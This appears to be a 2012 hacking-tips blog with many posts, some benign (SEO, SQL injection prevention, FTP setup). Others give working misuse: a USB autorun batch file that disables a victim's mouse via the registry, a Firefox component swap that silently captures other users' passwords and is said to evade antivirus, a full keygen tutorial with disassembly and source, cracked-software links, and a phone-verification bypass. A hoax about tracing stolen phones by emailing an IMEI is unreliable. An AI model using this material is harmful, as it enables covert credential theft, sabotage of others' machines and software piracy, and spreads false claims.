Showing posts with label Internet. Show all posts
Showing posts with label Internet. Show all posts

Sunday 5 February 2012

Mask My IP 2.2.5.6 | Full version Free Download

Mask My IP 2.2.5.6
Mask My IP 2.2.5.6 | 5.3 Mb

When you connect to a network, your computer has a unique identification IP-address as your home address, alerting everyone who you are and where you are. When you visit online stores, or send an e-mail, your IP address associated with this activity, and it identifies you personally. Hackers who steal personal data can get into your computer, monitor your activities, to steal your personal information. Mask My IP program will help to solve this problem. 
Key Features: 
- Hide Real IP Address 
- Surf Anonymously 
- Block ISP Eavesdropping 
- Guard Against Hackers 
- Prevent Identity Theft & Credit Card Fraud 
- Protect All Connections Including Wi-Fi 
- Defend in the Forum once be banned 
- Send Anonymous Emails 
- Easy & Effective 
- Auto / Manual IP Changing 
- 100% Clean & Safe 
- Compatible With A lot

Home Page - http://www.mask-myip.com/
Setup
+
Crack
Mediafire
4shared
2shared

Tuesday 31 January 2012

All about Spiders, Crawlers, and Robots


In my first post of Seo sevices i am going to reveal some important terms related to SEO like Spiders, Crawlers and Robots. In my this creation i will provide a huge and deep detail of above terms. So lets start with Spiders


What are Website Spiders? 
Website crawling by website spiders is comparable to what a spider is real life does.  Google, and search engines like it, index your website by using these website crawlers which periodically come to your site.
 How do they relate to websites?      
SEO Spider Search engines use these website spiders to find your website and index it for future searches by search engine users. There a couple different ways a search engine may find your website and its pages to index.  One key to allow your site to be found is by having fresh new content and/or content rich pages.  Search engines don’t want to index old and irrelevant information.  A second key to get your website on Google is providing related article links, and good ones, on your page.  Providing good links to sites with a good reputation is very important, because those sites will provide you with positive linking to your own site.
Google, for instance, begins the website indexing process by using previous lists of URLs which had been generated from previous crawls.  Starting from these previously known sites, the crawlers continue on links from these sites.  Links which are shorter in length are the ones most likely to be followed, as crawlers deem those to be the most important. As you can see, links are the basis in web crawling and therefore a key for directing web spiders.
General Process of Web Crawling:
 Search engine spiders come to your site:
  • via links from other sites
  • your site’s previous relevance in the web directory of the search engine
  • due to the freshness of your site
Once on your website, the website spiders will read the content of each page.  The website crawlers site meta tags as well, and then follow the links that the internet site connects with if allowed.  The website spiders then return back to the depository, where the information is indexed.  Those links which are on your page will be indexed as well, unless meta tags prevent them.  This process is discussed in the Follow/No Follow blog by Vivek Creations .  Website spiders return periodically to check for any changes in information.  Regulatory of this depends on the moderators of the search engine, and it is something you can’t control.  Crawl frequency and depth are things which you can control.
Submitting a sitemap to the search engine is a major influence on the engines ability to better crawl your site.  The sitemap allows the engine to understand your website once the web spiders come to your website, and helps provide changes on the site to be indexed quicker.
What is a Robot.txt (robot text files)?
Robot.txt files are a website tool which can tell the spiders which pages to index.  By placing a robot.txt on the website server with either allow or disallow tag, it provides a set of instructions to the web crawlers which visit the page.  Essentially, robots.txt files are used to map out your site to the crawlers for what they can and cannot index.
The benefits of using a robot text file:                                                                                                                                    SEO Robots
  • Avoids wastage of server resources
  • Prevent website crawler access to pages which you don’t want to be indexed such as login pages
  • Prevent search engines from indexing pages which are still being built
One item to consider is if you want your entire website to be readily available to website spiders placing the robot.txt in your server isn’t necessary; not even one which allows everything.  Leaving the file out completely is the best decision to go with.
By knowing your website and providing search engines with quality pages will allow your site to get to the top of Google, and by properly using robot.txt files will help to improve website navigation.

In my next post of seo services i will explain about Meta Tags in well explained way.
Thanks for reading my post.
If you want to ask or having any doubt regarding my post than you can mention in your comments.

Thursday 26 January 2012

How to Prevent a website from SQL Injection Attack | Full Tutorial


A SQL injection is a common programming error the consequences of which can be really devastating. Many successful hacking attacks start when a hacker discovers a vulnerability that gives an opportunity to inject SQL code.

When an SQL injection occurs, the structure of an SQL query is compromised and as a result you are left at the mercy of the potential hackers. If there is a vulnerability found, hackers can exploit it to gain access not only to your site and database but in extreme cases also to your corporate network. When hackers can inject their code in your code, they can do what they want.

Why do SQL injections happen so often?


The shortest answer is that SQL injections are so popular because of poor programming. Hackers know about the potential of a successful SQL injection attack and they search for vulnerabilities. Unfortunately, very often they don’t have to search hard – vulnerabilities pop right in their face. On the other hand, the risk for a hacker from executing an SQL injection is minor, while the potential rewards are lucrative. What else could a criminal ask for?
Therefore, don’t rely that hackers won’t bother with your site and don’t leave the door widely open. Nobody says that each vulnerability of this type will turn into an attack but it’s not wise to take any chances. The good news is that fortunately, SQL injections are also relatively easy to prevent.

Steps to prevent a SQL injection attack


Basically, there are two fire-proof ways to make an SQL injection impossible:


  • Don’t use dynamic database queries.
  • Don’t accept user input in queries.

However, obviously these two steps can’t be done because if you follow them, then the sites you can create will be very static and in today’s Web this is not a solution. What you can do, is minimize the risks when using dynamic queries and user input. Here are some basic principles that apply to any programming language:

1. Patch your SQL server regularly


Before we get into the coding part of the advice how to prevent an SQL injection, we need to start with the fundamental issues. SQL injections might be a frequent programming error but they aren’t the only way for a hacker to break into. If your underlying software – i.e. the database and the operating system have vulnerabilities, then your efforts to secure your code become obsolete. This is why you should always patch your system, especially your SQL server.

2. Limit the use of dynamic queries

As I already mentioned, dynamic queries are the door to SQL injections. Of course, it might not be realistic to expect that all dynamic queries can be trashed right away but some of the ways out are stored procedures, parameterized queries, and above all – prepared statements. The exact approaches vary from one programming language to the other but basically any programming language offers good substitutes of dynamic queries.

For instance, the PreparedStatement() with bind variables in Java, or the SqlCommand() and OleDbCommand() with bind variables in PHP, or strongly typed parameterized queries with bindParam() in PHP are all possibilities to explore.

3. Escape user input


The second biggest evil for SQL injections is user input. While you can’t always avoid user input completely, the next best thing is to escape it. Escaping user input doesn’t do as good job as limiting dynamic queries but still it can stop many SQL injection attacks. For instance, if you are using PHP, for GET and POST, use htmlspecialchars() to escape XSS characters and addslashes(), in case you using database. Alternatively, you can escape user input from inside your database but since the exact code varies from one database to the next, you should check with the docs of your database for the exact syntax to use.

4. Store database credentials in a separate file

In order to minimize the damage in case of an SQL injection attack, always store database credentials in a separate file. This way even if a hacker manages to break in, he or she won’t benefit much.

5. Use the principle of least privilege

The principle of least privilege is a security cornerstone and it applies to SQL injections as well. For instance, when you grant a user access only to the tables he or she needs rather to the whole database; this drastically reduces the damage potential.

6. Turn magic quotes off

Turning the magic_quotes_gpc variable off can also stop some SQL injection attacks. Unfortunately, this isn’t always a reliable measure because sometimes magic quotes might be off and you are unaware of this but still it is better than nothing. In any case, you need to have code to substitute quotes with slashes. Here is the simplest way to do it:

if (!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}

7. Disable shells


Many databases offer shell access which essentially is what an attacker needs. This is why you need to close this door. Consult your DB’s documentation about how to disable shell access for your particular database.

8. Disable any other DB functionality you don’t need

In addition to the shells there are many other functions in a database you don’t need. While not all of them are a security risk, the general rule here is that less is more. Just remove or at least disable any functionality you can do without.

9. Test your code

Finally, the last step to ensure your code is SQL injections-proofed is to test it. There are automated tools you can use to do this and one of the most universal is the SQL Inject Me Firefox extension. This tool has many options and many tests the best is if you have the time to run all of them.

All these steps to prevent an SQL injection are relatively easy to implement but failing to do so could make a huge difference. If you stick to these rules, you will drastically reduce the risk of your site being compromised via a SQL injection. Still, you can never be 100 per cent sure that you are completely protected against such an attack (or any other type of attack, to be more precise) and this is why you need to keep an eye on your logs so if a breach occurs, you will know it right away and react appropriately to minimize the damage.

For more about website security you can visit my all posts on WebSite Security
Thanks for reading this creation.
Be updated always here :)

Wednesday 25 January 2012

How to Track your lost mobile

Did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don’t need to be worried about it. Now a days each one of us carry Mobile devices and always fear that it may be stolen. Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.

This is how it works!!!!!!

1. Dial *#06# from your mobile.
2. Your mobile shows a unique 15 digit .
3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
5. No need to go to police.
6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
7. You will find where your hand set is being operated even in case your no is being changed.

PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.

If u lost your mobile, send an e-mail to cop@vsnl.net with the following info.

Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for communication:
Missed date:
IMEI No.:


Share this creation with your all friends, If in future they lost their mobile or you lost your mobile phone then it will be surely helpful.
Thanks for reading, Keep yourself updated here :)

Tuesday 24 January 2012

Meta Tags Expanded Full Tutorial | SEO

seo services

In my previous (All about Spiders, Crawlers, and Robots) post i have already explained about Spiders, Crawlers and Robots and its uses in seo serivces. Now today i am going to share another important part of SEO. As title of post shows that this post is well labeled about Meta tags. We are going on same path..
So lets start reading about another important part of SEO.

First of all, don't let me mislead you, meta tags are not the "magic bullet" that will skyrocket your site to the top of all search page listings. They are a tool that will help improve your standings in search engines that use them. Use them with other marketing strategies to garner more page views.

Another thing to remember: most search engines look at the body of text on your pages, as well as the page title. They take this information as higher relevance than any meta tags. So, be sure to always have a relevant <TITLE> on your pages, and relevant content in the body of the page. This will improve your rankings more than just meta tags alone.


What is a Meta Tag?


A meta tag is a hidden tag that lives in the <HEAD> of an HTML document. It is used to supply additional information about the HTML document. The meta tag has three possible attributes content,http-equiv, andname. Meta tags always provide information in a name/value pair. The name and http-equivattributes provide the name information and thecontentprovides the value information. Meta tags do not have a closing tag.


content
This attribute will always be found in a well formed meta tag. It provides the value information in the name/value pair. It can be any valid string, which you should enclose in quotes.

name
This is the name portion in the name value pair. You can use any name that you would like or that might be useful to you. Some common names are:


  • keywords - words that identify what the page is about, usually used in search engines

<meta name="keywords" content="HTML, HTML help, meta tags, promotion, web sites">
  • description - a short description of the page
<meta name="description" content="Boost your marketing strategy with meta tags">
  • author - the author's name and possibly email address

<meta name="author" content="Jennifer Kyrnin">

  • robots - to allow or disallow indexing by robots

<meta name="robots" content="noindex">

  • copyright - the copyright date of the page

<meta name="copyright" content="August 1999">

http-equiv
This attribute is also a name for the name/value pair, but it is used by the server to include that name/value pair in the MIME document header passed to the Web browser before sending the actual HTML document. Some common http-equiv types are:



  • charset - defines the character set used in the page
<meta http-equiv="charset" content="iso-8859-1">


  • expires - when the document will be out of date
<meta http-equiv="expires" content="31 Dec 99">


  • refresh - sets the number of seconds to reload the page or reload to a new page
Reload the page every 10 seconds:
<meta http-equiv="refresh" content="10">
Reload to a new page after 10 seconds:
<meta http-equiv="refresh" content="10;url=http://webdesign.about.com/">

How to Use a Meta Tag

Meta tags are included in the <HEAD> of an HTML document. If you are using meta tags to improve your standing in search engines, then you should focus on your description and keywords.

The description tag
Use the description tag to describe what your page is about. Engines that use it will supply the content of this tag when displaying a list of links. For example, if you do a search on About.com, you will see the description listed on the search results page.

The keywords tag
Keywords help search engines to categorize your site, and to allow people to find your pages more quickly. However, most search engines have limits as to how many meta keywords are viewed. It is a good idea to review your keywords and make sure that they are as concise and specific as possible.

Wait for the next part linked with my topic seo services. In my next post i will provide a full tutorial on Sitemap. How to build and how to submit it..

Saturday 21 January 2012

Disable your Friend’s Mouse By Just Inserting A USB In His/Her PC



Do you wanna Lock your friends mouse by just inserting a  small USB ?
Ok let me teach you how to do this prank, well my this creation is all about some windows coding.
But their is no need to learn about programming languages for that.


To use this trick first you have to create a Batch file in notepad by saving it with the .bat extension.


Copy/Paste the below code in notepad and save it as filename.bat, Here filename could be any name but the extension should be .bat.

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4 



Now you have create a autorun.inf file to run the above batch file automatically by just inserting the USB. Here is the autorun fil. Copy paste is code in the in the new Notepad window. 


[autorun]
Open=filename.bat
Action=Mouse Disable 


Save this file as autorun.inf.



Now you have created a virus that will disable the mouse. Copy both of the file in your or your friend’s USB Drive and have fun...


To re-enable the mouse, simply create another batch file with following script:

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

Save this file as .bat extension and run this batch file by just double clicking on it.
Enjoy this prank and share it with your friends :D



Friday 20 January 2012

Free Online TV | 2012 updated huge list

Ok my friends today i am going to share something cool and important. Actually its not important for all but mostly peoples now a days searching for good online streaming websites Or wants to watch online streaming TV but they failed to google it.
So, i am sharing a huge list of Online Streaming TV sites which allow user to watch online TV :)
Here is the list:

http://www.infomaza.com/
http://www.moviesfromindia.com/
http://www.musicspice.com/
http://asian-sensations.com/
http://www.shareview.us/
http://www.vzvideo.com/
http://www.firstdesitv.com/
http://www.bollydhoom.com/
http://www.lordoftv.com/
http://www.jumptv.com/en
http://www.revision3.com/indigital
http://revision3.com/diggnation
http://duggmirror.com/tech_news/techtv_r

http://www.freebe.tv/
http://www.wwitv.com/
http://www.channelchooser.com/
http://www.getdemocracy.com/
http://www.telegossip.org/
http://www.my-tv.it/video.jsp?idart=1875
http://www.nagoya-bunri.ac.jp/~inayoshi/
http://wwitv.com/portal.htm
http://gbstv.info/
http://www.tv.com/
http://www.jumptv.com/
http://www.beelinetv.com/
http://www.streamick.com/watchonline
http://www.viidoo.com/en/index.php
http://www.channelchooser.com/

http://www.viidoo.com/en/index.php
http://www.wavelit.com/index.asp
http://www.tetesaclaques.tv/video.php?vi
http://www.twit.tv/
http://www.ctv.ca/generic/generated/bpla
http://dl.tv/
http://www.comingsoon.net/
http://www.mediahopper.com/


Comment out the sites which are not working. And keep in touch of my creations ;)

How to Convert Firefox into keylogger


Do you want create your own working undectable keylogger and without any programming knowledge.The keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent. So i am going to teach you about the hidden tricks of mozilla on how to convert your mozilla into a keylogger or you can say your own keylogger :)

How this Keylogger Works?


Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.
We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.

Can this be detected by antivirus?
I have scanned it with Mcafee,Norton and Avast and it is totally undetectable.

Does It work on all websites?
It is working on almost all websites like facebook,hotmail,reddit and digg.But this trick somehow failed on Gmail.
Now I will give you the step by step tutorial on how to use this trick.
  1. Download this script here
  2. Now go to the following address
If you are Windows user then goto
C:/Program Files/Mozilla Firefox/Components

If you are MAC user then goto
Applications > Right click Firefox > Show Package Contents >Contents/MacOS/Components
  1. Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.
  2. Extract the script folder that you have downloaded in first step and copy and paste the nsLoginManagerPrompter.js from the folder to the folder mentioned in step 2.
  3. So now your firefox keylogger is ready.Now Each and every username and password will be automatically saved.
The next step is to retrieve the username and passwords that have been stored in your firefox browser.
It is very easy to retrieve the password from firefox using firepasswordviewer. (Click Here) For more detail about

Decrypt Passwords Stored in Firefox With FirePasswordViewer

Monday 16 January 2012

Youtube Videos Download Trick 2012

Youtube videos now you can download without any software of any other resources websites.
Its normally a trick to grab the youtube videos in seconds..
So what you need to do. Ok let me share this creation.

Firstly open the video page of youtube (The video which you want to download)
Like this:

Now simply add ss Just before the word youtube in the url.
Like this...

And HIT Enter :)
You have done.. 
Now you see a new webpage where the downloading link appears in different formats. Just enjoy the new creations. And read the more latest creations related to web.



Sunday 15 January 2012

Trick to bypass Mobile verification of any site

I know most of the peoples dont like the mobile verification term of websites. Its commonly used by Gmail, when you try to make multiple email ids with same ip then gmail ask for mobile verification to create the account. And unfortunately if you dont have any cell phone means you cant use email service.
Yeah it sucks..
But after some searching i have search out a website which is the world's leading web-based unified messaging system that channels your free voicemail and fax messages directly to your e-mail.

Overall means you can bypass/skip the step of mobile verification :)

In this creation i am going to teach you about how to bypass the mobile verification of any site.
So here are the steps.

1. First of all go to http://k7.net/. and sign up there.
This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone no. of US.

2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'.

3. Now click on 'I accept, create an account'.

4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from k7.net.

5. Now you will get a mail having verification code as voice mail on that account from which you have registered on K7.net. Open it, download the attachment file and listen the code.

6. Now enter the code of your voice mail in verification code. and click OK.

7. Yuppiiee, your account is ready now :)

Friday 6 January 2012

How to make key generators?


How to make key generators?
-===========================-
Introduction
------------
I take no responsibility of the usage of this information.
This tutorial, is for educational knowledge ONLY.
Hi there, in this tutorial, I intend to teach you how to make a pretty
simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...
I guess some of you might know the program.
I`ll assume you know:
A.How to use debugger (in this case, SoftIce).
B.How to crack, generally (finding protection routines,patching them,etc...).
C.How to use Disassembler (This knowledge can help).
D.Assembly.
E.How to code in Turbo Pascal ™.
Tools you`ll need:
A.SoftIce 3.00/01 or newer.
B.WD32Asm. (Not a must).
C.The program W3Filer V1.13 (if not provided in this package), can be found in
www.windows95.com I believe.
D.Turbo Pascal (ANY version).
Well, enough blah blah, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now,
We notice this program has some kind of serial number (Mine is 873977046),
Let's keep the serial in mind, I bet we`ll meet it again while we're on
the debugger.
Well, now, let's put your name and a dummy reg code...
set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...
I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
OK.
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
|
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A2FB©
|
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
does, is copying
the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A2E8©
|
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
|
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
what it does,
Let's continue tracing
the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order
to
Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
|
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
|
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A30F©
|
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
checking).
===================================================================================
============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
===================================================================================
One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A333©
|
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user
name, offset EAX.
:0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in
user name , offset EAX.
:0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
offset in user name! (Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX<EAX then, we leave the
loop.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A31C©
|
:0040A335 A120674100 mov eax, dword ptr [00416720] ---> HMMMMMM, What's in
here?????
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
EAX'
Does this number in EAX look
familiar to us? ;-)
If you still don`t understand,
than, It's
our SERIAL NUMBER! (PLEASE, take
your time, and check by
yourself - don`t trust me!). OK,
so now we know,
That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I
can tell you , the reg number, is
in EDX - only that the reg number
is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
|
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
|
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of
the code, is
just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
|
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
|
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A374©
|
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
|
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret
Making the actual Keygen
~~~~~~~~~~~~~~~~~~~~~~~~
Now, after I've explained how does the program calculate the registration
code, you can either write your own keymaker, without looking at my code, or
look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).
That's it, here's the source of my keygen:
------------------- Cut here ---------------------------------------------
Program W3FilerKeygen;
var
Key,SerialNum,EB,ED,digit:Longint;
I,x:Byte;
Name,KeyHex:String;
begin
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
readln(Name);
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
Key:=0;
x:=0;
For I:=1 to length(Name) do
begin
Name[I]:=upcase(Name[i]);
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
inc(x);
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
end;
end;
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
KeyHex:='';
repeat
digit:=Key mod 16;
key:=key div 16;
If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex;
If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
end.

Thursday 5 January 2012

How To Block Websties Without Software


Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

etc

Wednesday 4 January 2012

HOW TO CAPTURE STREAMING MEDIA


Many websites (http://ww.smashits.com) stream songs and videos
people believe they cannot be downloaded, quite why i dont know. they kinda think there is no file present to dwnld.

Once the file is located it can then be retrieved by nettransport
nettransport is able to dwnld any file whether ftp or rtsp etc

1. Download Project URL Snooper 1.02.01 from http://rain66.at.infoseek.co.jp/
2. Install URL Snooper (and WinPcap together)
3. Don't run URL Snooper when it is done installing
4. Restart computer
5. Open Project URL Snooper
6. Click on the General Options Tab
7. user posted image
8. Chose a network adapter
9. Now click on the search tab
10. Click Sniff Network
11. Go to a webpage and you should see some results in the results list
12. If nothing is appearing then chose another network adapter, until one works

13. Now you are ready to begin searching
14. Click the "Hide Non-Streaming URLs" option to hide all http:// references and only show URLs corresponding to streaming audio/video (rtsp, pnm, wma, etc.)
15. Then click Sniff Network
16. Your links should appear as you begin streaming your file
17. Select your desired stream user posted image
18. usually rm file user posted image
19. On the bottom there should be the link which you simply copy user posted image

20. Download nettransport from here ftp://down_transport:123@s1.5fox.com/NT2Setup_multi.EXE or
ftp://nettransport:nettransport@61.153.24...Setup_multi.EXE
http://lycos26486.l97.lycos.com.cn/download.htm

21. Install it
22. Click on new
23. Paste link

Now you should be able to download any file ;)

Create An Ftp Server On Your Pc With Serv-u


Requirements:
Serv-U
No-IP.com Website

Quote:
Step 1. Getting a static IP address.
Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don’t want your IP address posted out there for everyone to see.

1. Go to www.No-IP.com to create a new user account.
2. Fill in the information that is required and the click Register button.
3. Your account has now been created and your account password has been emailed to you.
4. Check your email mailbox and wait for the mail that contains your password
5. Go back to www.No-IP.com and type your email address and password to login to your account.
6. Once in your account, click on Add a host in the left menu
7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)
8. Check Allow Wildcards and click the Submit button
9. You now have your static address (example: rkchoolie.serveftp.com)
10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client
11. Once downloaded, install the software and type in your email address and password when asked.
12. Finally tick the checkbox near your static address.

You now have a static web address .


Quote:
Step 2. Installing and setting the FTP server
1. Install Serv-U 4.0.
2. Start Serv-U and use the wizard to setup your ftp.
3. Click next until you're asked for an IP address, leave it blank and then click next.
4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.
5. You are asked if you want to allow anonymous access, select No and then click next.
6. You are then asked to create a named account, check yes and then click next.
7. Type in the user name you wish for this account (example: Harrie) and click next.
8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.
9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.
10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.
11. The account is now set so click finish.

Quote:
Step 3. Configuring user accounts
1. In the left tree-menu, select the account you've just created and then click on the General tab.
2. Check Hide ‘Hidden’ Files.
3. Check Allow only and enter the number one in the box.
4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.
5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6. Now, click on the Dir Access tab.
7. You should see the home folder in there. Highlight it and make your permissions.
8. If you only want users to be able to download check only Read, List, & Inherit.
9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.
10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.
11. There are many other different sets of permissions you can play with. I just covered your basics.
12. Your server is now set!
